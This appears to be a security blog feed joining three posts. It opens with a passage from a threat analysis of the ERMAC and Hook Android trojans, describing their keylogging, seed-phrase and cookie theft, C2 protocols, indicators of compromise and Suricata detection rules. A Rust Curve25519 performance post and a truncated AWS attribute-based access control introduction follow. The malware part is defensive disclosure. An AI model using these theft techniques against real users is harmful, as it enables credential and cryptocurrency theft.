The ERMAC keylogger contains an extra check for accessibility event “TYPE_VIEW_SELECTED” (triggered when a user selects a view, such as tapping on a button). Accessibility services can extract information about a selected view, such as the text, and that is exactly what is happening here.

Hook specifically checks for two other accessibility events: the “TYPE_WINDOW_STATE_CHANGED” event (triggered when the state of an active window changes, for example when a new window is opened) or the “TYPE_WINDOW_CONTENT_CHANGED” event (triggered when the content within a window changes, like when the text within a window is updated).

It checks for these events in combination with the content change type

“CONTENT_CHANGE_TYPE_TEXT” (indicating that the text of an UI element has changed). This tells us that the accessibility service is interested in changes of the textual content within a window, which is not surprising for a keylogger.

Stealing of crypto wallet seed phrases

Automatic stealing of recovery seeds from crypto wallets is one of the main features in ERMAC and Hook. This feature is actively developed, with support added for extra crypto wallets in the latest version of Hook.

For this feature, the accessibility service first checks if a crypto wallet app has been opened. Then, it will find UI elements by their ID (such as “com.wallet.crypto.trustapp:id/wallets_preference” and “com.wallet.crypto.trustapp:id/item_wallet_info_action”) and automatically clicks on these elements until it navigated to the view that contains the recovery seed phrase. For the crypto wallet app, it will look like the user is browsing to this phrase by themselves.

Decompiled code that shows ERMAC and Hook searching for and clicking on UI elements in the Trust Wallet app.

Once the window with the recovery seed phrase is reached, it will extract the words from the recovery seed phrase and send them to the C2 server.

Decompiled code that shows the actions in ERMAC and Hook after obtaining the seed phrase.

The main implementation is the same in ERMAC and Hook for this feature, with Hook containing some extra logging messages and support for stealing seed phrases from additional cryptocurrency wallets.

Replacing copied crypto wallet addresses

Besides being able to automatically steal recovery seeds from opened crypto wallet apps, ERMAC and Hook can also detect whether a wallet address has been copied and replaces the clipboard with their own wallet address. It does this by monitoring for the “TYPE_VIEW_TEXT_CHANGED” event, and checking whether the text matches a regular expression for Bitcoin and Ethereum wallet addresses. If it matches, it will replace the clipboard text with the wallet address of the threat actor.

Decompiled code that shows how ERMAC and Hook replace copied crypto wallet addresses.

The wallet addresses that the actors use in both ERMAC and Hook are bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf for Bitcoin and 0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca for Ethereum. It’s worth mentioning that these wallet addresses are the same in all samples that we analysed. It appears that this feature has not been very successful for the actors, as they have received only two transactions at the time of writing.

Transactions received by the Ethereum wallet address of the actors.

Since the feature has been so unsuccessful, we assume that both received transactions were initiated by the actors themselves. The latest transaction was received from a verified Binance exchange wallet, and it’s unlikely that this comes from an infected device. The other transaction comes from a wallet that could be owned by the Hook actors.

Stealing of session cookies

The “cookie” command is exclusive to Hook and was only added in the latest version of this malware. This feature allows the malware operator to steal session cookies in order to take over the victim’s login session. To do so, a new WebViewClient is set up. When the victim has logged onto their account, the onPageFinished() method of the WebView will be called and it sends the stolen cookies to the C2 server.

Decompiled code that shows Google account session cookies will be sent to the C2 server.

All cookie stealing code is related to Google accounts. This is in line with DukeEugene’s announcement of new features that were posted about on April 1st, 2023. See #12 in the screenshot below.

DukeEugene announced new features in Hook, showing the main objective for the “cookie” command.

C2 communication protocol

HTTP in ERMAC

ERMAC is known to use the HTTP protocol for communicating with the C2 server, where data is encrypted using AES-256-CBC and then Base64 encoded. The bot sends HTTP POST requests to a randomly generated URL that ends with “.php/” (note that the IP of the C2 server remains the same).

Decompiled code that shows how request URLs are built in ERMAC.
Example HTTP POST request that was made during dynamic analysis of ERMAC.

WebSockets in Hook

The first editions of Hook introduced WebSocket communication using Socket.IO, and data is encrypted using the same mechanism as in ERMAC. The Socket.IO library is built on top of the WebSocket protocol and offers low-latency, bidirectional and event-based communication between a client and a server. Socket.IO provides additional guarantees such as fallback to the HTTP protocol and automatic reconnection [3].

Screenshot of WebSocket communication using Socket.IO in Hook.

The screenshot above shows that the login command was issued to the server, with the user ID of the infected device being sent as encrypted data. The “42” at the beginning of the message is standard in Socket.IO, where the “4” stands for the Engine.IO “message” packet type and the “2” for Socket.IO’s “message” packet type [3].

Mix and match – Protocols in latest versions of Hook

The latest Hook version that we’ve analysed contains the ERMAC HTTP protocol implementation, as well as the WebSocket implementation which already existed in previous editions of Hook. The Hook code snippet below shows that it uses the exact same code implementation as observed in ERMAC to build the URLs for HTTP requests.

Decompiled code that shows the latest version of Hook implemented the same logic for building URLs as ERMAC.

Both Hook and ERMAC use the “checkAP” command to check for commands sent by the C2 server. In the screenshot below, you can see that the malware operator sent the “killme” command to the infected device to uninstall Hook. This shows that the ERMAC HTTP protocol is actively used in the latest versions of Hook, together with the already existing WebSocket implementation.

The infected device is checking for commands sent by the C2 in Hook.

C2 servers

During our investigation into the technical differences between Hook and ERMAC, we have also collected C2 servers related to both families. From these servers, Russia is clearly the preferred country for hosting Hook and ERMAC C2s. We have identified a total of 23 Hook C2 servers that are hosted in Russia.

Other countries that we have found ERMAC and Hook are hosted in are:

  • The Netherlands
  • United Kingdom
  • United States
  • Germany
  • France
  • Korea
  • Japan
Popular countries for hosting Hook and ERMAC C2 servers.

The end?

On the 19th of April 2023, DukeEugene announced that they are closing the Hook project due to leaving for “special military operation”. The actor mentions that the coder of the Hook project, who goes by the nickname “RedDragon”, will continue to support their clients until their lease runs out.

DukeEugene mentions that they are closing the Hook project. Note that the first post was created on 19 April 2023 initially and edited a day later.

Two days prior to this announcement, the coder of Hook created a post stating that the source code of Hook is for sale at a price of $70.000. Nearly a month later, on May 11th, the coder asked if the thread could be closed as the source code was sold.

Hook’s coder announcing that the source code is for sale.

Observations

In the “Replacing copied crypto wallet addresses” section of this blog, we mentioned that the first received transaction comes from an Ethereum wallet address that could possibly be owned by the Hook actors. We noticed that this wallet received a transaction of roughly $25.000 the day after Hook was announced sold. This could be a coincidence, but the fact that this wallet was also the first to send (a small amount of) money to the Ethereum address that is hardcoded in Hook and ERMAC makes us suspect this.

Ethereum transaction that could be related to Hook.

We can’t verify whether the messages from DukeEugene and RedDragon are true. But if they are, we expect to see interesting new forks of Hook in the future.

In this blog we’ve debunked DukeEugene’s statement of Hook being fully developed from scratch. Additionally, in DukeEugene’s advertisement of HookBot we see a screenshot of the Hook panel that seemed to show similarities with ERMAC’s panel.

Conclusion

While the actors of Hook had announced that the malware was written from scratch, it is clear that the ERMAC source code was used as a base. All commands that are present in ERMAC also exist in Hook, and the code implementation of these commands is nearly identical in both malware families. Both Hook and ERMAC contain typical features to steal credentials which are common in Android malware, such as overlay attacks/injections and keylogging. Perhaps a more interesting feature that exists in both malware families is the automated stealing of recovery seeds from cryptocurrency wallets.

While Hook was not written completely from scratch, the authors have added interesting new features compared to ERMAC. With the added capability of being able to stream the victim’s screen and interacting with the UI, operators of Hook can gain complete control over infected devices and perform actions on the user’s behalf. Other interesting new features include the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Besides these new features, significant changes were made in the protocol for communicating with the C2 server. The first versions of Hook introduced WebSocket communication using the Socket.IO library. The latest version of Hook added the HTTP protocol implementation that was already present in ERMAC and can use this next to WebSocket communication.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, with the actor claiming that he is leaving for “special military operation”. The coder of Hook has allegedly put the source code up for sale at a price of $70,000 and stated that it was sold on May 11th, 2023. If these announcements are true, it could mean that we will see interesting new forks of Hook in the future.

Indicators of Compromise

Analysed samples

FamilyPackage nameFile hash (SHA-256)
Hookcom.lojibiwawajinu.gunac5996e7a701f1154b48f962d01d457f9b7e95d9c3dd9bbd6a8e083865d563622
Hookcom.wawocizurovi.gadomid651219c28eec876f8961dcd0a0e365df110f09b7ae72eccb9de8c84129e23cb
ERMACcom.cazojowiruje.tutadoe0bd84272ea93ea857cc74a745727085cf214eef0b5dcaf3a220d982c89cea84
ERMACcom.jakedegivuwuwe.yewo6d8707da5cb71e23982bd29ac6a9f6069d6620f3bc7d1fd50b06e9897bc0ac50

C2 servers

FamilyIP address
Hook5.42.199[.]22
Hook45.81.39[.]149
Hook45.93.201[.]92
Hook176.100.42[.]11
Hook91.215.85[.]223
Hook91.215.85[.]37
Hook91.215.85[.]23
Hook185.186.246[.]69
ERMAC5.42.199[.]91
ERMAC31.41.244[.]187
ERMAC45.93.201[.]92
ERMAC92.243.88[.]25
ERMAC176.113.115[.]66
ERMAC165.232.78[.]246
ERMAC51.15.150[.]5
ERMAC176.100.42[.]11
ERMAC91.215.85[.]22
ERMAC35.91.53[.]224
ERMAC193.106.191[.]148
ERMAC20.249.63[.]72
ERMAC62.204.41[.]98
ERMAC193.106.191[.]121
ERMAC193.106.191[.]116
ERMAC176.113.115[.]150
ERMAC91.213.50[.]62
ERMAC193.106.191[.]118
ERMAC5.42.199[.]3
ERMAC193.56.146[.]176
ERMAC62.204.41[.]94
ERMAC176.113.115[.]67
ERMAC108.61.166[.]245
ERMAC45.159.248[.]25
ERMAC20.108.0[.]165
ERMAC20.210.252[.]118
ERMAC68.178.206[.]43
ERMAC35.90.154[.]240

Network detection

The following Suricata rules were tested successfully against Hook network traffic:

# Detection for Hook/ERMAC mobile malware
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook/ERMAC HTTP POST"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/php/"; depth:5; content:".php/"; isdataat:!1,relative; fast_pattern; pcre:"/^\/php\/[a-z0-9]{1,21}\.php\/$/U"; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004440; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook Websocket Packet Observed (login)"; content:"|81|"; depth:1; byte_test:1,&,0x80,1; luajit:hook.lua; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004441; rev:2;)
view raw hook.rules hosted with ❤ by GitHub

The second Suricata rule uses an additional Lua script, which can be found here

List of Commands

FamilyCommandDescription
ERMAC, Hook 1 2sendsmsSends a specified SMS message to a specified number. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 2startussdExecutes a given USSD code on the victim’s device
ERMAC, Hook 1 2forwardcallSets up a call forwarder to forward all calls to the specified number in the payload
ERMAC, Hook 1 2pushDisplays a push notification on the victim’s device, with a custom app name, title, and text to be edited by the malware operator
ERMAC, Hook 1 2getcontactsGets list of all contacts on the victim’s device
ERMAC, Hook 1 2getaccountsGets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 2logaccountsGets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 2getinstallappsGets a list of the installed apps on the victim’s device
ERMAC, Hook 1 2getsmsSteals all SMS messages from the victim’s device
ERMAC, Hook 1 2startinjectPerforms a phishing overlay attack against the given application
ERMAC, Hook 1 2openurlOpens the specified URL
ERMAC, Hook 1 2startauthenticator2Starts the Google Authenticator app
ERMAC, Hook 1 2trustLaunches the Trust Wallet app
ERMAC, Hook 1 2myceliumLaunches the Mycelium Wallet app
ERMAC, Hook 1 2piukLaunches the Blockchain Wallet app
ERMAC, Hook 1 2samouraiLaunches the Samourai Wallet app
ERMAC, Hook 1 2bitcoincomLaunches the Bitcoin Wallet app
ERMAC, Hook 1 2toshiLaunches the Coinbase Wallet app
ERMAC, Hook 1 2metamaskLaunches the Metamask Wallet app
ERMAC, Hook 1 2sendsmsallSends a specified SMS message to all contacts on the victim’s device. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 2startappStarts the app specified in the payload
ERMAC, Hook 1 2clearcashSets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 2clearcacheSets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 2callingCalls the number specified in the “number” payload, tries to lock the device and attempts to hide and mute the application
ERMAC, Hook 1 2deleteapplicationUninstalls a specified application
ERMAC, Hook 1 2startadminSets the “start_admin” shared preference key to value 1, which is probably used as a check before attempting to gain Device Admin privileges (as seen in Hook samples)
ERMAC, Hook 1 2killmeStores the package name of the malicious app in the “killApplication” shared preference key, in order to uninstall it. This is the kill switch for the malware
ERMAC, Hook 1 2updateinjectandlistappsGets a list of the currently installed apps on the victim’s device, and downloads the injection target lists
ERMAC, Hook 1 2gmailtitlesSets the “gm_list” shared preference key to the value “start” and starts the Gmail app
ERMAC, Hook 1 2getgmailmessageSets the “gm_mes_command” shared preference key to the value “start” and starts the Gmail app
Hook 1 2start_vncStarts capturing the victim’s screen constantly (streaming)
Hook 1 2stop_vncStops capturing the victim’s screen constantly (streaming)
Hook 1 2takescreenshotTakes a screenshot of the victim’s device (note that it starts the same activity as for the “start_vnc” command, but it does so without the extra “streamScreen” set to true to only take one screenshot)
Hook 1 2swipePerforms a swipe gesture with the specified 4 coordinates
Hook 1 2swipeupPerform a swipe up gesture
Hook 1 2swipedownPerforms a swipe down gesture
Hook 1 2swipeleftPerforms a swipe left gesture
Hook 1 2swiperightPerforms a swipe right gesture
Hook 1 2scrollupPerforms a scroll up gesture
Hook 1 2scrolldownPerforms a scroll down gesture
Hook 1 2onkeyeventPerforms a certain action depending on the specified key payload (POWER DIALOG, BACK, HOME, LOCK SCREEN, or RECENTS
Hook 1 2onpointereventSets X and Y coordinates and performs an action based on the payload text provided. Three options: “down”, “continue”, and “up”. It looks like these payload texts work together, as in: it first sets the starting coordinates where it should press down, then it sets the coordinates where it should draw a line to from the previous starting coordinates, then it performs a stroke gesture using this information
Hook 1 2longpressDispatches a long press gesture at the specified coordinates
Hook 1 2tapDispatches a tap gesture at the specified coordinates
Hook 1 2clickatClicks at a specific UI element
Hook 1 2clickattextClicks on the UI element with a specific text value
Hook 1 2clickatcontaintextClicks on the UI element that contains the payload text
Hook 1 2cuttextReplaces the clipboard on the victim’s device with the payload text
Hook 1 2settextSets a specified UI element to the specified text
Hook 1 2openappOpens the specified app
Hook 1 2openwhatsappSends a message through Whatsapp to the specified number
Hook 1 2addcontactAdds a new contact to the victim’s device
Hook 1 2getcallhistoryGets a log of the calls that the victim made
Hook 1 2makecallCalls the number specified in the payload
Hook 1 2forwardsmsSets up an SMS forwarder to forward the received and sent SMS messages from the victim device to the specified number in the payload
Hook 1 2getlocationGets the geographic coordinates (latitude and longitude) of the victim
Hook 1 2getimagesGets list of all images on the victim’s device
Hook 1 2downloadimageDownloads an image from the victim’s device
Hook 1 2fmmanagerEither lists the files at a specified path (additional parameter “ls”), or downloads a file from the specified path (additional parameter “dl”)
Hook 2send_sms_manySends an SMS message to multiple phone numbers
Hook 2addwaitviewDisplays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
Hook 2removewaitviewRemoves a “RelativeLayout” view group, which displays child views together in relative positions. More specifically: this command removes the “wait / loading” view that is displayed on the victim’s device as a result of the “addwaitview” command
Hook 2addviewAdds a new view with a black background that covers the entire screen
Hook 2removeviewRemoves a “LinearLayout” view group, which arranges other views either horizontally in a single column or vertically in a single row. More specifically: this command removes the view with the black background that was added by the “addview” command
Hook 2cookieSteals session cookies (targets victim’s Google account)
Hook 2safepalStarts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2exodusStarts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2takephotoTakes a photo of the victim using the front facing camera

References


[1] – https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities
[2] – https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware
[3] – https://socket.io/docs/v4/

On Multiplications with Unsaturated Limbs

18 September 2023 at 17:04

This post is about a rather technical coding strategy choice that arises when implementing cryptographic algorithms on some elliptic curves, namely how to represent elements of the base field. We will be discussing Curve25519 implementations, in particular as part of Ed25519 signatures, as specified in RFC 8032. The most widely used Rust implementation of these operations is the curve25519-dalek library. My own research library is crrl, also written in plain Rust (no assembly); it is meant for research purposes, but I write it using all best practices for production-level implementations, e.g. it is fully constant-time and offers an API amenable to integration into various applications.

The following table measures performance of Ed25519 signature generation and verification with these libraries, using various backend implementations for operations in the base field (integers modulo 2255 – 19), on two test platforms (64-bit x86, and 64-bit RISC-V):

Implementationx86 (Intel “Coffee Lake”)RISC-V (SiFive U74)
LibraryBackendsignverifysignverify
crrlm6449130108559202021412764
m5170149148653158928304902
curve25519-daleksimd59553116243
serial59599169621180142449980
fiat70552198289187220429755
Ed25519 performance (in clock cycles), on x86 and RISC-V.

Test platforms are the following:

  • x86: an Intel Core i5-8259U CPU, running at 2.30 GHz (TurboBoost is disabled). This uses “Coffee Lake” cores (one of the late variants of the “Skylake” line). Operating system is Linux (Ubuntu 22.04), in 64-bit mode.
  • RISC-V: a StarFive VisionFive2 board with a StarFive JH7110 CPU, running at 1 GHz. The CPU contains four SiFive U74 cores and implements the I, M, C, Zba and Zbb architecture extensions (and some others which are not relevant here). Operating system is again Linux (Ubuntu 23.04), in 64-bit mode.

In both cases, the current Rust “stable” version is used (1.72.0, from 2023-08-23), and compilation uses the environment variable RUSTFLAGS=”-C target-cpu=native” to allow the compiler to use all opcodes supported by the current platform. The computation is performed over a single core, with measurements averaged over randomized inputs. The CPU cycle counter is used. Figures above are listed with many digits, but in practice there is a bit of natural variance due to varying inputs (signature verification is not constant-time, since it uses only public data) and, more generally, because of the effect of various operations also occurring within the CPU (e.g. management mode, cache usage from other cores, interruptions from hardware…), so that the measured values should be taken with a grain of salt (roughly speaking, differences below about 3% are not significant).

crrl and curve25519-dalek differ a bit in how they use internal tables to speed up computations; in general, crrl tables are smaller, and crrl performs fewer point additions but more point doublings. For signature verification, crrl implements the Antipa et al optimization with Lagrange’s algorithm for lattice basis reduction, but curve25519-dalek does not. The measurements above show that crrl’s strategy works (i.e. it is a tad faster than curve25519-dalek) (note: not listed above is the fact that curve25519-dalek supports batch signature verification with a substantially lower per-signature cost; crrl does not implement that feature yet). The point of this post is not to boast about how crrl is faster; its good performance should be taken as an indication that it is decently optimized and thus a correct illustration of the effect of its implementation strategy choices. Indeed, the interesting part is how the different backends compare to each other, on the two tested architectures.

curve25519-dalek has three backends:

  • serial: Field elements are split over 5 limbs of 51 bits; that is, value x is split into five values x0 to x4, such that x = x0 + 251x1 + 2102x2 + 2153x3 + 2204x4. Importantly, limb values are held in 64-bit words and may somewhat exceed 251 (within some limits, to avoid overflows during computations). The representation is redundant, in that a given field element x accepts many different representations; a normalization step is applied when necessary (e.g. when serializing curve points into bytes).
  • fiat: The fiat backend is a wrapper around the fiat-crypto library, which uses basically the same implementation strategy as the serial backend, but through automatic code generation that includes a correctness proof. In other words, the fiat backend is guaranteed through the magic of mathematics to always return the correct result, while in all other library backends listed here, the guarantee is “only” through the non-magic of code auditors (including myself) poring over the code for hours in search of issues, and not finding any (in practice all the code referenced here is believed correct).
  • simd: AVX2 opcodes are used to perform arithmetic operations on four field elements in parallel; each element is split over ten limbs of 25 and 26 bits each. curve25519-dalek selects that backend whenever possible, i.e. on x86 systems which have AVX2 (such as an Intel “Coffee Lake”), but of course it is not available on RISC-V.

crrl has two backends:

  • m51: A “51-bit limbs” backend similar to curve25519-dalek’s “serial”, though with somewhat different choices for the actual operations (this is detailed later on).
  • m64: Field elements are split over four 64-bit limbs, held in 64-bit types. By nature, such limbs cannot exceed their 64-bit range. The representation is still slightly redundant in that overall values may use the complete 256-bit range, so that each field element has two or three possible representations (a final reduction modulo 2255 – 19 is performed before serializing).

The “m64” backend could be deemed to be the most classical, in that such a representation would be what was preferred for big integer computations in, say, the 1990s. It minimizes the number of multiplication opcode invocations during a field element multiplication (with two 4-limb operands, 16 register multiplications are used), but also implies quite a lot of carry propagation. See for instance this excerpt of the implementation of field element multiplication in crrl’s m64 backend:

    let (e0, e1) = umull(a0, b0);
let (e2, e3) = umull(a1, b1);
let (e4, e5) = umull(a2, b2);
let (e6, e7) = umull(a3, b3);

let (lo, hi) = umull(a0, b1);
let (e1, cc) = addcarry_u64(e1, lo, 0);
let (e2, cc) = addcarry_u64(e2, hi, cc);
let (lo, hi) = umull(a0, b3);
let (e3, cc) = addcarry_u64(e3, lo, cc);
let (e4, cc) = addcarry_u64(e4, hi, cc);
let (lo, hi) = umull(a2, b3);
let (e5, cc) = addcarry_u64(e5, lo, cc);
let (e6, cc) = addcarry_u64(e6, hi, cc);
let (e7, _) = addcarry_u64(e7, 0, cc);

let (lo, hi) = umull(a1, b0);
let (e1, cc) = addcarry_u64(e1, lo, 0);
let (e2, cc) = addcarry_u64(e2, hi, cc);
let (lo, hi) = umull(a3, b0);
let (e3, cc) = addcarry_u64(e3, lo, cc);
let (e4, cc) = addcarry_u64(e4, hi, cc);
let (lo, hi) = umull(a3, b2);
let (e5, cc) = addcarry_u64(e5, lo, cc);
let (e6, cc) = addcarry_u64(e6, hi, cc);
let (e7, _) = addcarry_u64(e7, 0, cc);

The addcarry_u64() calls above implement the “add with carry” operation, which, on x86, map to the ADC opcode (or, on that core, the ADCX or ADOX opcodes).

When Ed25519 signatures were invented, in 2011, the Intel CPUs du jour (Intel “Westmere” core) were not very good at carry propagation; they certainly supported the ADC opcode, but with a relatively high latency (2 cycles), and that made the classical code somewhat slow. The use of 51-bit limbs allowed a different code, which, in curve25519-dalek’s serial backend, looks like this:

    let b1_19 = b[1] * 19;
let b2_19 = b[2] * 19;
let b3_19 = b[3] * 19;
let b4_19 = b[4] * 19;

// Multiply to get 128-bit coefficients of output
let c0: u128 = m(a[0], b[0]) + m(a[4], b1_19) + m(a[3], b2_19) + m(a[2], b3_19) + m(a[1], b4_19);
let mut c1: u128 = m(a[1], b[0]) + m(a[0], b[1]) + m(a[4], b2_19) + m(a[3], b3_19) + m(a[2], b4_19);
let mut c2: u128 = m(a[2], b[0]) + m(a[1], b[1]) + m(a[0], b[2]) + m(a[4], b3_19) + m(a[3], b4_19);
let mut c3: u128 = m(a[3], b[0]) + m(a[2], b[1]) + m(a[1], b[2]) + m(a[0], b[3]) + m(a[4], b4_19);
let mut c4: u128 = m(a[4], b[0]) + m(a[3], b[1]) + m(a[2], b[2]) + m(a[1], b[3]) + m(a[0] , b[4]);

This code excerpt computes the result over five limbs which can now range over close to 128 bits, and some extra high part propagation (not shown above) is needed to shrink limbs down to 51 bits or so. As we see here, there are now 25 individual multiplications (the m() function), since there are five limbs per input. There still are ADC opcodes in there! They are somewhat hidden behind the additions: these additions are over Rust’s u128 type, a 128-bit integer type that internally uses two registers, so that each addition implies one ADC opcode. However, these carry propagations can occur mostly in parallel (there are five independent dependency chains here), and that maps well to the abilities of a Westmere core. On such cores, the “serial” backend is faster than crrl’s m64. However, in later x86 CPUs from Intel (starting with the Haswell core), support for add-with-carry opcodes was substantially improved, and the classical method with 64-bit limbs again gained the upper hand. This was already noticed by Nath and Sarkar in 2018 and this explains why crrl’s m64 backend, on our x86 test system, is faster than curve25519-dalek’s serial and fiat backends, and even a bit faster than the AVX2-powered simd backend.

RISC-V

Now enters the RISC-V platform. RISC-V is an open architecture which has been designed with what can be viewed as “pure RISC philosophy”, with a much reduced instruction set. It is inspired from the older DEC Alpha, including in particular a large number of integer registers (32), one of which being fixed to the value zero, and, most notably, no carry flag at all. An “add-with-carry” operation, which adds together two 64-bit inputs x and y and an input carry c, and outputs a 64-bit result z and an output carry d, now requires no fewer than five instructions:

  1. Add x and y, into z (ADD).
  2. Compare z to x (SLTU): if z is strictly lower, then the addition “wrapped around”; the comparison output (0 or 1) is written into d.
  3. Add c to z (ADD).
  4. Compare z to c (SLTU) for another potential “wrap around”, with a 0 or 1 value written into another register t.
  5. Add t to d (ADD).

(I cannot prove that it is not doable in fewer RISC-V instructions; if there is a better solution please tell me.)

Thus, the add-with-carry is not only a high-latency sequence, but it also requires quite a few instructions, and instruction throughput may be a bottleneck. Out test platform (SiFive U74 core) is not well documented, but some cursory tests show the following:

  • Multiplication opcodes have a throughput of one per cycle, and a latency of three cycles (this seems constant-time). As per the RISC-V specification (“M” extension), a 64×64 multiplication with a 128-bit result requires two separate opcodes (MUL returns the low 64 bits of the result, MULHU returns the high 64 bits). There is a recommended code sequence for when the two opcodes relate to the same operands, but this does not appear to be leveraged by this particular CPU.
  • For “simple” operations such as ADD or SLTU, the CPU may schedule up to two instructions in the same cycle, but the exact conditions for this to happen are unclear, and each instruction still has a 1-cycle latency.

Under such conditions, a 5-instruction add-with-carry will need a minimum of 2.5 cycles (in terms of throughput). The main output (z) is available with a latency of 2 cycles, but the output carry has a latency of 4 cycles. A “partial” add-with-carry with no input carry is cheaper (an ADD and a SLTU), and so is an add-with-carry with no output carry (two ADDs), but these are still relatively expensive. The high latency is similar to the Westmere situation, but the throughput cost is new. For that RISC-V platform, we need to avoid not only long dependency chains of carry propagation, but we should also endeavour to do fewer carry propagations. Another operation which is similarly expensive is the split of a 115-bit value (held in a 128-bit variable) into a low (51 bits) and high (64 bits) parts. The straightforward Rust code looks like this (from curve25519-dalek):

    let carry: u64 = (c4 >> 51) as u64;
out[4] = (c4 as u64) & LOW_51_BIT_MASK;

On x86, the 128-bit value is held in two registers; the low part is a simple bitwise AND with a constant, and the high part is extracted with a single SHLD opcode, that can extract a chunk out of the concatenation of two input registers. On RISC-V, there is no shift opcode with two input registers (not counting the shift count); instead, the extraction of the high part (called carry in the code excerpt above) requires three instructions: two single-register shifts (SHR, SHL) and one bitwise OR to combine the results.

In order to yield better performance on RISC-V, the crrl m51 backend does things a bit differently:

    let a0 = a0 << 6;
let b0 = b0 << 7;
// ...
let (c00, h00) = umull(a0, b0);
let d0 = c00 >> 13;

Here, the input limbs are pre-shifted (by 6 or 7 bits) so that the products are shifted by 13 bits. In that case, the boundary between the low and high parts falls exactly on the boundary between the two registers that receive the multiplication result; the extraction of the high part becomes free! The low part is obtained with a single opcode (a right shift of the low register by 13 bits). Moreover, instead of performing 128-bit additions, crrl’s m51 code adds the low and high parts separately:

    let d0 = c00 >> 13;
let d1 = (c01 >> 13)
+ (c10 >> 13);
let d2 = (c02 >> 13)
+ (c11 >> 13)
+ (c20 >> 13);
// ...
let h0 = h00;
let h1 = h01 + h10;
let h2 = h02 + h11 + h20;

In that way, all add-with-carry operations are avoided. This makes crrl’s m51 code somewhat slower than curve2519-dalek’s serial backend on x86, but it quite improves the performance on RISC-V.

Conclusion

The discussion above is about a fairly technical point. In the grand scheme of things, the differences in performance between the various implementation strategies is not great; there are not many usage contexts where a speed difference of less than 30% in computing or verifying Ed25519 signatures has any relevance to overall application performance. But, insofar as such things matter, the following points are to be remembered:

  • Modern large CPUs (for laptops and servers) are good at handling add-with-carry, and for them the classical “64-bit limbs” format tends to be the fastest.
  • Some smaller CPUs will be happier with 51-bit limbs. However, there is no one-size-fits-all implementation strategy: for some CPUs, the main issue is the latency of add-with-carry, while for some others, in particular RISC-V systems, the instruction throughput is the bottleneck.

Introduction to AWS Attribute-Based Access Control

2 October 2023 at 12:01

AWS allows tags, arbitrary key-value pairs, to be assigned to many resources. Tags can be used to categorize resources however you like. Some examples:

  • In an account holding multiple applications, a tag called “application” might be used to denote which application is associated with each resource.
  • A tag called “stage” might be used to separate resources belonging to alpha, beta, and production stages within a single account.
  • A tag called “cost-center” might be used to indicate which business unit is responsible for a resource. AWS’ billing can break down bills by tag, allowing customers to allocate costs from a shared account to the appropriate budgets.

Once you have tagged your resources, you can search and filter based on tags. That’s not very interesting from a security perspective. Far more interesting is using tags to implement attribute-based access control (ABAC).

Attribute-Based Access Control

The “normal” AWS authorization scheme is known as Role-Based Access Control (RBAC): you define “roles” corresponding to service or job functions (implemented as IAM Users or Roles) and assign them the privileges necessary for those functions. A disadvantage of this scheme is that when you add new resources to your environment, the privileges assigned to your principals may need to be modified. This doesn’t scale particularly well with large numbers of resources. Using resource-based permission policies rather than identity-based permission policies can help with this, but that doesn’t scale well with large numbers of principals (especially since AWS doesn’t allow permissions to be granted to groups using resource-based permission policies). Also, not all resources support resource-based permission policies.

An alternative authorization scheme is to assign tags to principals and resources then grant permissions based on the combinations of principal and resource tags. For instance, all principals tagged as belonging to project QuarkEagle can be allowed to access resources also tagged as belonging to project QuarkEagle, while principals tagged with project CrunchyNugget can only access resources also tagged CrunchyNugget. This approach isn’t suitable for all scenarios but can result in significantly fewer and smaller permission policies that rarely need to be updated even as new principals and resources are added to accounts. This scheme is known as “attribute-based access control” (ABAC) or “tag-based access control” (TBAC), depending on the source.

In practice, you’re not likely to want a “pure” ABAC environment: most ABAC deployments will combine it with elements of RBAC.

How AWS implements ABAC

Apart from tags themselves, there are no new fundamental concepts in AWS for ABAC. You still have principals and resources with identity-based and resource-based permission policies. However, instead of having a lot of specifics in the resource and principal fields, an ABAC permission policy will have wildcards in those fields with the real logic implemented using conditions. There are four main condition keys that relate to tagging:

  • aws:ResourceTag/<tag-name>: control access based the values of tags attached to the resource being accessed.
  • aws:RequestTag/<tag-name>: control the tag values that can be assigned to or removed from resources.
  • aws:TagKeys: control access based on the tag keys specified in a request. This is a multi-valued condition key.
  • aws:PrincipalTag/<tag-name>: control access based on the values of tags attached to the principal making the API request.

Some examples are in order to clarify how these condition keys are be used.

If a principal is only permitted to publish messages to SNS Topics belonging to project QuarkEagle, then it might have this permission policy statement:

{
    "Effect": "Allow",
    "Action": "sns:Publish",
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
        "StringEquals": {
            "aws:ResourceTag/project": "QuarkEagle"
        }
    }
}

This allows your principal to publish to any SNS Topic, so long as that Topic has a tag named “project” whose value is “QuarkEagle”. If tiy want to go a step farther, you could tag your principals with their associated projects and then use this permission policy statement instead:

{
    "Effect": "Allow",
    "Action": "sns:Publish",
    "Resource": "arn:aws:sns:*:*:*",
    "Condition": {
